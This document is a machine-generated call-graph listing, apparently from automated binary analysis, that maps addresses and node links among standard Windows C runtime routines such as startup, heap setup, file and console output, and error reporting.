16952->16953 16956 7fef74fcc07 std::exception::_Copy_str 16952->16956 16953->16950 16954->16952 16954->16953 16955 7fef74fcc99 16954->16955 16955->16953 16978 7fef7501640 16955->16978 16956->16953 16958 7fef74fcc73 WriteFile 16956->16958 16958->16953 16959 7fef74fcd10 16960 7fef74f7ff0 _invoke_watson_if_error 16 API calls 16959->16960 16961 7fef74fcd3d GetModuleFileNameW 16960->16961 16962 7fef74fcd68 16961->16962 16967 7fef74fcdb1 16961->16967 16963 7fef7501640 17 API calls 16962->16963 16964 7fef74fcd84 16963->16964 16966 7fef74f7ff0 _invoke_watson_if_error 16 API calls 16964->16966 16965 7fef74fce5e 16998 7fef7502d80 16965->16998 16966->16967 16967->16965 16988 7fef7503380 16967->16988 16969 7fef74fce76 16971 7fef74f7ff0 _invoke_watson_if_error 16 API calls 16969->16971 16973 7fef74fcea3 16971->16973 16972 7fef74fce31 16974 7fef74f7ff0 _invoke_watson_if_error 16 API calls 16972->16974 16975 7fef7502d80 17 API calls 16973->16975 16974->16965 16976 7fef74fceb9 16975->16976 16977 7fef74f7ff0 _invoke_watson_if_error 16 API calls 16976->16977 16977->16953 16979 7fef7501661 16978->16979 16980 7fef75016c2 16979->16980 16983 7fef7501700 _calloc_dbg_impl 16979->16983 16982 7fef74fbd70 _invalid_parameter 17 API calls 16980->16982 16981 7fef7501832 _calloc_dbg_impl 16984 7fef75016f6 _calloc_dbg_impl 16981->16984 16987 7fef74fbd70 _invalid_parameter 17 API calls 16981->16987 16982->16984 16983->16981 16985 7fef75017f4 16983->16985 16984->16959 16986 7fef74fbd70 _invalid_parameter 17 API calls 16985->16986 16986->16984 16987->16984 16989 7fef75033a6 16988->16989 16990 7fef750342f 16989->16990 16992 7fef750346d _calloc_dbg_impl 16989->16992 16995 7fef75033bc _calloc_dbg_impl 16989->16995 16991 7fef74fbd70 _invalid_parameter 17 API calls 16990->16991 16991->16995 16993 7fef75035fb 16992->16993 16992->16995 16996 7fef7503639 _calloc_dbg_impl 16992->16996 16994 7fef74fbd70 _invalid_parameter 17 API calls 16993->16994 16994->16995 16995->16972 16996->16995 16997 7fef74fbd70 _invalid_parameter 17 API calls 16996->16997 16997->16995 16999 7fef7502da1 16998->16999 17000 7fef7502e02 16999->17000 17002 7fef7502e40 _calloc_dbg_impl 16999->17002 17001 7fef74fbd70 _invalid_parameter 17 API calls 17000->17001 17006 7fef7502e36 _calloc_dbg_impl 17001->17006 17003 7fef7502f34 17002->17003 17004 7fef7502f72 _calloc_dbg_impl 17002->17004 17007 7fef74fbd70 _invalid_parameter 17 API calls 17003->17007 17005 7fef75030b5 17004->17005 17008 7fef75030f3 _calloc_dbg_impl 17004->17008 17009 7fef74fbd70 _invalid_parameter 17 API calls 17005->17009 17006->16969 17007->17006 17008->17006 17010 7fef74fbd70 _invalid_parameter 17 API calls 17008->17010 17009->17006 17010->17006 18175 7fef7510550 18176 7fef751055e 18175->18176 18177 7fef7510575 18175->18177 18176->18177 18178 7fef7510568 CloseHandle 18176->18178 18178->18177 18633 7fef74f5854 18634 7fef74f585b _calloc_dbg_impl 18633->18634 18635 7fef74fc020 _free_base 2 API calls 18634->18635 18636 7fef74f59d5 18635->18636 17022 7fef74f5357 17025 7fef74f9360 LeaveCriticalSection 17022->17025 17024 7fef74f5361 17025->17024 18642 7fef74fa057 18643 7fef74fa061 18642->18643 18644 7fef74fa234 18643->18644 18650 7fef74fa08e __initmbctable 18643->18650 18645 7fef74fa25d IsValidCodePage 18644->18645 18649 7fef74fa22d __initmbctable 18644->18649 18647 7fef74fa27b GetCPInfo 18645->18647 18645->18649 18646 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18648 7fef74fa470 18646->18648 18647->18649 18652 7fef74fa295 __initmbctable 18647->18652 18649->18646 18651 7fef74fa5e0 __initmbctable 19 API calls 18650->18651 18651->18649 18653 7fef74fa5e0 __initmbctable 19 API calls 18652->18653 18653->18649 17645 7fef74f425a FlsGetValue FlsSetValue 17646 7fef74f4283 17645->17646 18179 7fef74fe55a 18180 7fef74fe564 18179->18180 18181 7fef74fe601 18180->18181 18182 7fef74fe5c2 RtlLookupFunctionEntry 18180->18182 18182->18181 18654 7fef74f405b 18656 7fef74f406e 18654->18656 18660 7fef74f9360 LeaveCriticalSection 18656->18660 18658 7fef74f4224 18659 7fef74f41bb _updatetlocinfoEx_nolock 18661 7fef74f9360 LeaveCriticalSection 18659->18661 18660->18659 18661->18658 18183 7fef750595c 18184 7fef74fcf50 terminate 35 API calls 18183->18184 18185 7fef7505961 18184->18185 17647 7fef7510e40 17648 7fef7510e50 17647->17648 17649 7fef7510e5e 17647->17649 17648->17649 17650 7fef74f3e00 3 API calls 17648->17650 17650->17649 18662 7fef7511040 18665 7fef74fe8f0 18662->18665 18664 7fef751108f 18666 7fef74fe90d 18665->18666 18667 7fef7503cc0 __SehTransFilter 39 API calls 18666->18667 18668 7fef74fe980 18667->18668 18668->18664 18190 7fef750f53e 18191 7fef750f55c 18190->18191 18192 7fef750f74d 18191->18192 18193 7fef7510170 23 API calls 18191->18193 18194 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18192->18194 18193->18192 18195 7fef750f7c5 18194->18195 16542 7fef74f7640 GetStartupInfoW 16550 7fef74f7676 _calloc_dbg 16542->16550 16543 7fef74f7ce0 SetHandleCount 16554 7fef74f7689 16543->16554 16544 7fef74f7b95 GetStdHandle 16546 7fef74f7c7b 16544->16546 16547 7fef74f7bb9 16544->16547 16545 7fef74f7ab9 16545->16543 16545->16544 16545->16546 16546->16543 16547->16546 16548 7fef74f7bc8 GetFileType 16547->16548 16548->16546 16549 7fef74f7beb InitializeCriticalSectionAndSpinCount 16548->16549 16549->16546 16549->16554 16550->16545 16552 7fef74f7a32 InitializeCriticalSectionAndSpinCount 16550->16552 16553 7fef74f7a19 GetFileType 16550->16553 16550->16554 16552->16545 16552->16554 16553->16545 16553->16552 17651 7fef74fae40 17652 7fef74fd490 std::exception::_Copy_str 17 API calls 17651->17652 17653 7fef74fae59 17652->17653 17654 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17653->17654 17655 7fef74fae86 std::exception::_Copy_str 17654->17655 17659 7fef74faf3a std::exception::_Copy_str 17655->17659 17674 7fef7500fd0 17655->17674 17657 7fef74faf0d 17658 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17657->17658 17658->17659 17661 7fef74fb2e0 17659->17661 17662 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 17659->17662 17660 7fef74fb33e 17684 7fef7500cc0 17660->17684 17661->17660 17663 7fef74fd490 std::exception::_Copy_str 17 API calls 17661->17663 17662->17661 17665 7fef74fb311 17663->17665 17667 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17665->17667 17667->17660 17668 7fef74fb37d 17671 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17668->17671 17669 7fef74fcff0 terminate 34 API calls 17670 7fef74fb373 17669->17670 17672 7fef74f7090 _exit 33 API calls 17670->17672 17673 7fef74fb3a0 17671->17673 17672->17668 17675 7fef7500ff7 17674->17675 17677 7fef7500ff0 __SehTransFilter 17674->17677 17676 7fef7501055 17675->17676 17679 7fef7501093 _calloc_dbg_impl 17675->17679 17678 7fef74fbd70 _invalid_parameter 17 API calls 17676->17678 17677->17657 17678->17677 17679->17677 17680 7fef750111a 17679->17680 17682 7fef7501158 17679->17682 17681 7fef74fbd70 _invalid_parameter 17 API calls 17680->17681 17681->17677 17682->17677 17683 7fef74fbd70 _invalid_parameter 17 API calls 17682->17683 17683->17677 17702 7fef74f3d00 RtlEncodePointer 17684->17702 17686 7fef7500cf6 17687 7fef7500d23 LoadLibraryW 17686->17687 17688 7fef7500e15 17686->17688 17689 7fef7500d44 GetProcAddress 17687->17689 17690 7fef7500d3d 17687->17690 17692 7fef7500e39 DecodePointer DecodePointer 17688->17692 17698 7fef7500e68 17688->17698 17689->17690 17691 7fef7500d6a 7 API calls 17689->17691 17697 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17690->17697 17691->17688 17694 7fef7500df3 GetProcAddress EncodePointer 17691->17694 17692->17698 17693 7fef7500f60 DecodePointer 17693->17690 17694->17688 17695 7fef7500f0d 17695->17693 17700 7fef7500f2f DecodePointer 17695->17700 17696 7fef7500eed DecodePointer 17696->17695 17699 7fef74fb358 17697->17699 17698->17695 17698->17696 17701 7fef7500ec8 17698->17701 17699->17668 17699->17669 17700->17693 17700->17701 17701->17693 17702->17686 17703 7fef74f9240 17704 7fef74f925f 17703->17704 17705 7fef74f924d 17703->17705 17706 7fef74f9281 InitializeCriticalSectionAndSpinCount 17704->17706 17707 7fef74f9295 17704->17707 17706->17707 17709 7fef74f9360 LeaveCriticalSection 17707->17709 17709->17705 18196 7fef74f1140 18197 7fef74f116a 18196->18197 18198 7fef74f118c 18197->18198 18199 7fef74f119a FileTimeToSystemTime 18197->18199 18200 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18198->18200 18199->18198 18201 7fef74f11ae 18199->18201 18203 7fef74f11d0 18200->18203 18204 7fef74f1000 GetThreadLocale GetDateFormatA 18201->18204 18205 7fef74f1062 GetThreadLocale GetTimeFormatA 18204->18205 18206 7fef74f105b 18204->18206 18205->18206 18206->18198 18669 7fef750dc41 18670 7fef750ee40 25 API calls 18669->18670 18673 7fef750da75 18670->18673 18671 7fef750eca1 18672 7fef74fbd70 _invalid_parameter 17 API calls 18671->18672 18675 7fef750dbe9 _LocaleUpdate::~_LocaleUpdate 18671->18675 18672->18675 18673->18671 18674 7fef750dbb5 18673->18674 18678 7fef74fbd70 _invalid_parameter 17 API calls 18674->18678 18676 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18675->18676 18677 7fef750ed9e 18676->18677 18678->18675 18679 7fef74f8040 18680 7fef74f8056 18679->18680 18681 7fef74f805b GetModuleFileNameA 18679->18681 18682 7fef74faa40 __initmbctable 24 API calls 18680->18682 18683 7fef74f8083 18681->18683 18682->18681 18684 7fef74fd04a 18685 7fef74fd1d8 DecodePointer 18684->18685 18686 7fef74fd1e8 18685->18686 18687 7fef74f7090 _exit 33 API calls 18686->18687 18688 7fef74fd209 18686->18688 18692 7fef74fd1f0 18686->18692 18687->18688 18690 7fef74fd289 18688->18690 18693 7fef74f3d00 RtlEncodePointer 18688->18693 18690->18692 18694 7fef74f9360 LeaveCriticalSection 18690->18694 18693->18690 18694->18692 17030 7fef7511370 17033 7fef750af60 17030->17033 17034 7fef750af74 17033->17034 17035 7fef750af98 LeaveCriticalSection 17033->17035 17038 7fef74f9360 LeaveCriticalSection 17034->17038 17037 7fef750af96 17035->17037 17038->17037 18207 7fef750e16f 18208 7fef750e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 18207->18208 18209 7fef750eadf 18208->18209 18210 7fef750eec0 25 API calls 18208->18210 18215 7fef750da75 18208->18215 18211 7fef750ef10 25 API calls 18209->18211 18210->18209 18212 7fef750eafd 18211->18212 18213 7fef750eb33 18212->18213 18217 7fef750eec0 25 API calls 18212->18217 18214 7fef750ec29 18213->18214 18227 7fef750eb49 _CrtMemDumpAllObjectsSince 18213->18227 18216 7fef750ef10 25 API calls 18214->18216 18218 7fef750eca1 18215->18218 18220 7fef750dbb5 18215->18220 18228 7fef750ebda 18216->18228 18217->18213 18219 7fef74fbd70 _invalid_parameter 17 API calls 18218->18219 18222 7fef750dbe9 _LocaleUpdate::~_LocaleUpdate 18218->18222 18219->18222 18225 7fef74fbd70 _invalid_parameter 17 API calls 18220->18225 18221 7fef750eec0 25 API calls 18221->18215 18223 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18222->18223 18224 7fef750ed9e 18223->18224 18225->18222 18226 7fef750f000 wcsxfrm 2 API calls 18226->18227 18227->18226 18227->18228 18229 7fef750ee40 25 API calls 18227->18229 18228->18215 18228->18221 18229->18227 16228 7fef74f8670 GetEnvironmentStringsW 16229 7fef74f8690 16228->16229 16231 7fef74f8697 WideCharToMultiByte 16228->16231 16232 7fef74f875f FreeEnvironmentStringsW 16231->16232 16233 7fef74f8733 16231->16233 16232->16229 16233->16232 16234 7fef74f876e WideCharToMultiByte 16233->16234 16235 7fef74f87c2 FreeEnvironmentStringsW 16234->16235 16236 7fef74f87aa 16234->16236 16235->16229 16236->16235 16285 7fef74f3471 16286 7fef74f34bc 16285->16286 16287 7fef74f347a 16285->16287 16288 7fef74f3496 16287->16288 16297 7fef74f70b0 16287->16297 16300 7fef74f7d00 16288->16300 16292 7fef74f3e00 3 API calls 16293 7fef74f34a0 16292->16293 16304 7fef74f88d0 HeapDestroy 16293->16304 16295 7fef74f34a5 16295->16286 16296 7fef74f3e00 3 API calls 16295->16296 16296->16286 16305 7fef74f7280 16297->16305 16303 7fef74f7d0e 16300->16303 16301 7fef74f349b 16301->16292 16302 7fef74f7d87 DeleteCriticalSection 16302->16303 16303->16301 16303->16302 16304->16295 16306 7fef74f7296 _exit 16305->16306 16308 7fef74f72c7 RtlDecodePointer 16306->16308 16314 7fef74f7368 _initterm 16306->16314 16326 7fef74f744e 16306->16326 16307 7fef74f745e 16311 7fef74f70c3 16307->16311 16312 7fef74f7520 _exit LeaveCriticalSection 16307->16312 16309 7fef74f72e5 DecodePointer 16308->16309 16308->16314 16320 7fef74f7314 16309->16320 16311->16288 16313 7fef74f7479 16312->16313 16352 7fef74f74e0 16313->16352 16314->16326 16329 7fef74f6210 16314->16329 16319 7fef74f736d DecodePointer 16328 7fef74f3d00 RtlEncodePointer 16319->16328 16320->16314 16320->16319 16325 7fef74f7391 DecodePointer DecodePointer 16320->16325 16327 7fef74f3d00 RtlEncodePointer 16320->16327 16323 7fef74f7449 16342 7fef74f6f10 16323->16342 16325->16320 16326->16307 16349 7fef74f7520 16326->16349 16327->16320 16328->16320 16330 7fef74f6229 16329->16330 16331 7fef74f628f 16330->16331 16333 7fef74f62cb 16330->16333 16355 7fef74fbd70 DecodePointer 16331->16355 16359 7fef74f9360 LeaveCriticalSection 16333->16359 16335 7fef74f62c3 16335->16326 16336 7fef74f7100 16335->16336 16337 7fef74f7112 16336->16337 16338 7fef74f71e4 DecodePointer 16337->16338 16339 7fef74f71fe 16338->16339 16384 7fef74f3d00 RtlEncodePointer 16339->16384 16341 7fef74f7219 16341->16323 16385 7fef74f63e0 16342->16385 16344 7fef74f6f33 16345 7fef74f6f8e 16344->16345 16393 7fef74f6660 16344->16393 16347 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16345->16347 16348 7fef74f6fa7 16347->16348 16348->16326 16461 7fef74f9360 LeaveCriticalSection 16349->16461 16351 7fef74f752e 16351->16307 16462 7fef74f7490 GetModuleHandleW 16352->16462 16356 7fef74fbdd0 16355->16356 16357 7fef74fbdac 16355->16357 16360 7fef74fbe00 16356->16360 16357->16335 16359->16335 16363 7fef74fbe50 16360->16363 16364 7fef74fbe81 terminate 16363->16364 16365 7fef74fbe8d RtlCaptureContext RtlLookupFunctionEntry 16363->16365 16364->16365 16366 7fef74fbf64 16365->16366 16367 7fef74fbf1c RtlVirtualUnwind 16365->16367 16368 7fef74fbf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16366->16368 16367->16368 16369 7fef74fbfde terminate 16368->16369 16372 7fef74f3280 16369->16372 16371 7fef74fbe2d GetCurrentProcess TerminateProcess 16371->16357 16373 7fef74f3289 16372->16373 16374 7fef74f3294 16373->16374 16375 7fef74f3720 RtlCaptureContext RtlLookupFunctionEntry 16373->16375 16374->16371 16376 7fef74f3764 RtlVirtualUnwind 16375->16376 16377 7fef74f37a5 16375->16377 16378 7fef74f37c7 IsDebuggerPresent 16376->16378 16377->16378 16383 7fef74f8d90 16378->16383 16380 7fef74f3826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16381 7fef74f384e GetCurrentProcess TerminateProcess 16380->16381 16382 7fef74f3844 terminate 16380->16382 16381->16371 16382->16381 16383->16380 16384->16341 16386 7fef74f63f1 16385->16386 16387 7fef74f6447 16386->16387 16390 7fef74f6480 16386->16390 16388 7fef74fbd70 _invalid_parameter 17 API calls 16387->16388 16389 7fef74f647b 16388->16389 16389->16344 16392 7fef74f6504 16390->16392 16397 7fef74f9360 LeaveCriticalSection 16390->16397 16392->16344 16394 7fef74f6681 _CrtMemDumpAllObjectsSince 16393->16394 16398 7fef74f6850 16394->16398 16396 7fef74f6698 _LocaleUpdate::~_LocaleUpdate 16396->16345 16397->16389 16399 7fef74f6871 16398->16399 16400 7fef74f6ba6 16399->16400 16402 7fef74f68ed _CrtIsValidPointer 16399->16402 16428 7fef74f9360 LeaveCriticalSection 16400->16428 16404 7fef74f6976 16402->16404 16405 7fef74f695e IsBadReadPtr 16402->16405 16415 7fef74f692f 16402->16415 16403 7fef74f6bb0 16403->16396 16406 7fef74f6ad2 16404->16406 16408 7fef74f6a29 16404->16408 16405->16404 16407 7fef74f6add 16406->16407 16413 7fef74f6b2d 16406->16413 16412 7fef74f6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16407->16412 16409 7fef74f6abe 16408->16409 16410 7fef74f6a86 IsBadReadPtr 16408->16410 16416 7fef74f6bf0 16409->16416 16410->16409 16410->16415 16412->16415 16414 7fef74f6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16413->16414 16413->16415 16414->16415 16415->16396 16417 7fef74f6c28 16416->16417 16418 7fef74f6e25 _LocaleUpdate::~_LocaleUpdate 16417->16418 16420 7fef74f6c7a _CrtMemDumpAllObjectsSince 16417->16420 16419 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16418->16419 16421 7fef74f6e89 16419->16421 16423 7fef74f6ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16420->16423 16429 7fef74fc260 16420->16429 16421->16415 16433 7fef74fc0c0 16423->16433 16425 7fef74f6e12 16425->16415 16426 7fef74f6dc7 16426->16425 16436 7fef74f6ea0 16426->16436 16428->16403 16430 7fef74fc286 _CrtMemDumpAllObjectsSince wcsxfrm 16429->16430 16432 7fef74fc29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16430->16432 16440 7fef74ff4d0 16430->16440 16432->16423 16451 7fef7502260 16433->16451 16435 7fef74fc103 16435->16426 16437 7fef74f6ed1 16436->16437 16438 7fef74f6ebd 16436->16438 16437->16425 16438->16437 16439 7fef74fbe00 _invoke_watson_if_oneof 16 API calls 16438->16439 16439->16437 16441 7fef74ff4f9 _CrtMemDumpAllObjectsSince 16440->16441 16444 7fef74ff570 16441->16444 16443 7fef74ff550 _LocaleUpdate::~_LocaleUpdate 16443->16432 16445 7fef74ff599 MultiByteToWideChar 16444->16445 16447 7fef74ff60b malloc _calloc_dbg_impl _MarkAllocaS 16445->16447 16449 7fef74ff604 _CrtMemDumpAllObjectsSince_stat 16445->16449 16448 7fef74ff68b MultiByteToWideChar 16447->16448 16447->16449 16448->16449 16450 7fef74ff6ca GetStringTypeW 16448->16450 16449->16443 16450->16449 16452 7fef750228b 16451->16452 16453 7fef75022e1 16452->16453 16454 7fef750231f 16452->16454 16455 7fef74fbd70 _invalid_parameter 17 API calls 16453->16455 16456 7fef7502385 16454->16456 16459 7fef75023c3 _calloc_dbg_impl 16454->16459 16458 7fef7502315 _calloc_dbg_impl 16455->16458 16457 7fef74fbd70 _invalid_parameter 17 API calls 16456->16457 16457->16458 16458->16435 16459->16458 16460 7fef74fbd70 _invalid_parameter 17 API calls 16459->16460 16460->16458 16461->16351 16463 7fef74f74b2 GetProcAddress 16462->16463 16464 7fef74f74d1 ExitProcess 16462->16464 16463->16464 18234 7fef7511160 18237 7fef7504e90 18234->18237 18236 7fef7511179 18238 7fef7504ecf 18237->18238 18239 7fef7504ebb 18237->18239 18238->18236 18239->18238 18240 7fef74fcf50 terminate 35 API calls 18239->18240 18240->18238 16645 7fef74f8860 HeapCreate 16646 7fef74f8891 GetVersion 16645->16646 16647 7fef74f888d 16645->16647 16648 7fef74f88c1 16646->16648 16649 7fef74f88a7 HeapSetInformation 16646->16649 16648->16647 16649->16648 17710 7fef7505260 17711 7fef7505296 __SehTransFilter _CreateFrameInfo 17710->17711 17712 7fef74fed30 _FindAndUnlinkFrame 36 API calls 17711->17712 17713 7fef75053e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17712->17713 17043 7fef7501b64 17044 7fef7501b9d 17043->17044 17045 7fef7501c86 17044->17045 17046 7fef750ab10 17 API calls 17044->17046 17047 7fef7501bed 17044->17047 17045->17047 17048 7fef7509290 23 API calls 17045->17048 17046->17045 17048->17047 17049 7fef750bb66 17050 7fef750bb78 _CrtMemDumpAllObjectsSince wcsxfrm 17049->17050 17051 7fef750bc46 17050->17051 17053 7fef750b99c 17050->17053 17052 7fef74fbd70 _invalid_parameter 17 API calls 17051->17052 17056 7fef750bb0e _LocaleUpdate::~_LocaleUpdate 17052->17056 17054 7fef750cc93 17053->17054 17057 7fef750bada 17053->17057 17055 7fef74fbd70 _invalid_parameter 17 API calls 17054->17055 17054->17056 17055->17056 17058 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17056->17058 17060 7fef74fbd70 _invalid_parameter 17 API calls 17057->17060 17059 7fef750cd90 17058->17059 17060->17056 17068 7fef750d410 17073 7fef750d3e0 17068->17073 17071 7fef750d43c 17080 7fef7510070 17073->17080 17076 7fef750d710 17077 7fef750d721 17076->17077 17078 7fef750d726 17076->17078 17077->17071 17085 7fef74f9360 LeaveCriticalSection 17078->17085 17081 7fef7510083 _free_nolock 17080->17081 17084 7fef74f9360 LeaveCriticalSection 17081->17084 17083 7fef750d402 17083->17071 17083->17076 17084->17083 17085->17077 17086 7fef7502c10 17087 7fef7502c53 17086->17087 17088 7fef7502c24 _updatetlocinfoEx_nolock 17086->17088 17090 7fef74f9360 LeaveCriticalSection 17088->17090 17090->17087 18245 7fef74fae14 18246 7fef74fb390 18245->18246 18247 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18246->18247 18248 7fef74fb3a0 18247->18248 18249 7fef7500215 18250 7fef7500231 18249->18250 18255 7fef7500302 18249->18255 18320 7fef7508c80 18250->18320 18252 7fef7500489 18254 7fef7502d80 17 API calls 18252->18254 18257 7fef75004a3 18254->18257 18258 7fef750040d 18255->18258 18327 7fef7508c30 18255->18327 18256 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18259 7fef750027e OutputDebugStringW 18256->18259 18261 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18257->18261 18258->18252 18262 7fef7501640 17 API calls 18258->18262 18260 7fef7500296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 18259->18260 18274 7fef75002f2 18260->18274 18264 7fef75004d0 18261->18264 18266 7fef750045c 18262->18266 18268 7fef750053d 18264->18268 18269 7fef7502d80 17 API calls 18264->18269 18271 7fef7500583 18264->18271 18267 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18266->18267 18267->18252 18270 7fef7502d80 17 API calls 18268->18270 18272 7fef7500510 18269->18272 18273 7fef7500556 18270->18273 18330 7fef7501590 18271->18330 18279 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18272->18279 18280 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18273->18280 18276 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18274->18276 18275 7fef7500357 18277 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18275->18277 18278 7fef75003af 18275->18278 18281 7fef7500cae 18276->18281 18277->18278 18278->18258 18282 7fef7501640 17 API calls 18278->18282 18279->18268 18280->18271 18284 7fef75003e0 18282->18284 18285 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18284->18285 18285->18258 18286 7fef75005fa 18287 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18286->18287 18288 7fef7500652 18286->18288 18287->18288 18289 7fef7501640 17 API calls 18288->18289 18292 7fef75006b0 18288->18292 18290 7fef7500683 18289->18290 18291 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18290->18291 18291->18292 18293 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18292->18293 18294 7fef7500769 18293->18294 18295 7fef74fd490 std::exception::_Copy_str 17 API calls 18294->18295 18311 7fef75007bd 18294->18311 18296 7fef7500790 18295->18296 18297 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18296->18297 18297->18311 18298 7fef7500905 18298->18274 18299 7fef7500a26 18298->18299 18303 7fef75009a4 GetFileType 18298->18303 18300 7fef7500ba5 18299->18300 18301 7fef7500b97 OutputDebugStringW 18299->18301 18300->18274 18305 7fef7500c23 18300->18305 18306 7fef7508c80 _itow_s 17 API calls 18300->18306 18301->18300 18304 7fef75009d0 18303->18304 18310 7fef75009ce 18303->18310 18307 7fef75009dd WriteConsoleW 18304->18307 18334 7fef74fb470 18305->18334 18309 7fef7500bf6 18306->18309 18307->18299 18308 7fef7500a2b GetLastError 18307->18308 18308->18299 18308->18310 18312 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18309->18312 18313 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18310->18313 18311->18298 18333 7fef74f9360 LeaveCriticalSection 18311->18333 18312->18305 18315 7fef7500ab5 18313->18315 18316 7fef7500b26 WriteFile 18315->18316 18317 7fef7500ad0 18315->18317 18316->18299 18319 7fef7500add WriteFile 18317->18319 18319->18299 18321 7fef7508cd3 18320->18321 18322 7fef7508ca6 18320->18322 18323 7fef7508d00 _itow_s 17 API calls 18321->18323 18322->18321 18324 7fef7508cad 18322->18324 18325 7fef7500251 18323->18325 18360 7fef7508d00 18324->18360 18325->18256 18376 7fef75086b0 18327->18376 18329 7fef7508c74 18329->18275 18331 7fef75086b0 _wcsftime_l 17 API calls 18330->18331 18332 7fef75015de 18331->18332 18332->18286 18333->18298 18335 7fef74fb48d 18334->18335 18336 7fef74fb4ce GetModuleFileNameW 18335->18336 18337 7fef74fb4c4 18335->18337 18338 7fef74fb4f2 18336->18338 18343 7fef74fb538 18336->18343 18340 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18337->18340 18339 7fef7501640 17 API calls 18338->18339 18342 7fef74fb50b 18339->18342 18341 7fef74fba58 18340->18341 18341->18274 18344 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18342->18344 18345 7fef7500fd0 17 API calls 18343->18345 18348 7fef74fb5f2 18343->18348 18344->18343 18346 7fef74fb5c5 18345->18346 18347 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18346->18347 18347->18348 18349 7fef7501590 _snwprintf_s 17 API calls 18348->18349 18350 7fef74fb940 18349->18350 18351 7fef74fb998 18350->18351 18352 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18350->18352 18353 7fef7501640 17 API calls 18351->18353 18356 7fef74fb9f6 18351->18356 18352->18351 18354 7fef74fb9c9 18353->18354 18355 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18354->18355 18355->18356 18356->18337 18357 7fef74fcff0 terminate 34 API calls 18356->18357 18358 7fef74fba2b 18357->18358 18359 7fef74f7090 _exit 33 API calls 18358->18359 18359->18337 18362 7fef7508d25 18360->18362 18361 7fef7508d7b 18363 7fef74fbd70 _invalid_parameter 17 API calls 18361->18363 18362->18361 18364 7fef7508db9 18362->18364 18373 7fef7508daf 18363->18373 18365 7fef7508e1a 18364->18365 18367 7fef7508e58 _calloc_dbg_impl 18364->18367 18366 7fef74fbd70 _invalid_parameter 17 API calls 18365->18366 18366->18373 18368 7fef7508f5d 18367->18368 18369 7fef7508f9b 18367->18369 18370 7fef74fbd70 _invalid_parameter 17 API calls 18368->18370 18371 7fef750900e 18369->18371 18374 7fef750904c 18369->18374 18370->18373 18372 7fef74fbd70 _invalid_parameter 17 API calls 18371->18372 18372->18373 18373->18325 18374->18373 18375 7fef74fbd70 _invalid_parameter 17 API calls 18374->18375 18375->18373 18377 7fef75086e6 18376->18377 18378 7fef750873c 18377->18378 18380 7fef750877a 18377->18380 18379 7fef74fbd70 _invalid_parameter 17 API calls 18378->18379 18388 7fef7508770 _calloc_dbg_impl 18379->18388 18381 7fef750880e 18380->18381 18382 7fef750884c 18380->18382 18380->18388 18385 7fef74fbd70 _invalid_parameter 17 API calls 18381->18385 18383 7fef7508992 18382->18383 18384 7fef7508862 18382->18384 18387 7fef7508350 _wcsftime_l 17 API calls 18383->18387 18391 7fef7508350 18384->18391 18385->18388 18389 7fef75088b1 _calloc_dbg_impl 18387->18389 18388->18329 18389->18388 18390 7fef74fbd70 _invalid_parameter 17 API calls 18389->18390 18390->18388 18392 7fef750839b 18391->18392 18393 7fef75083f1 18392->18393 18395 7fef750842f 18392->18395 18394 7fef74fbd70 _invalid_parameter 17 API calls 18393->18394 18397 7fef7508425 18394->18397 18396 7fef74fbd70 _invalid_parameter 17 API calls 18395->18396 18395->18397 18396->18397 18397->18389 17091 7fef74f7816 17092 7fef74f7826 _calloc_dbg 17091->17092 17095 7fef74f7a32 InitializeCriticalSectionAndSpinCount 17092->17095 17096 7fef74f7a19 GetFileType 17092->17096 17098 7fef74f7ab9 17092->17098 17093 7fef74f7ce0 SetHandleCount 17094 7fef74f7aaf 17093->17094 17095->17094 17095->17098 17096->17095 17096->17098 17097 7fef74f7b95 GetStdHandle 17099 7fef74f7c7b 17097->17099 17100 7fef74f7bb9 17097->17100 17098->17093 17098->17097 17098->17099 17099->17093 17100->17099 17101 7fef74f7bc8 GetFileType 17100->17101 17101->17099 17102 7fef74f7beb InitializeCriticalSectionAndSpinCount 17101->17102 17102->17094 17102->17099 16502 7fef74f461b 16503 7fef74f4625 _calloc_dbg_impl 16502->16503 16506 7fef74f9360 LeaveCriticalSection 16503->16506 16505 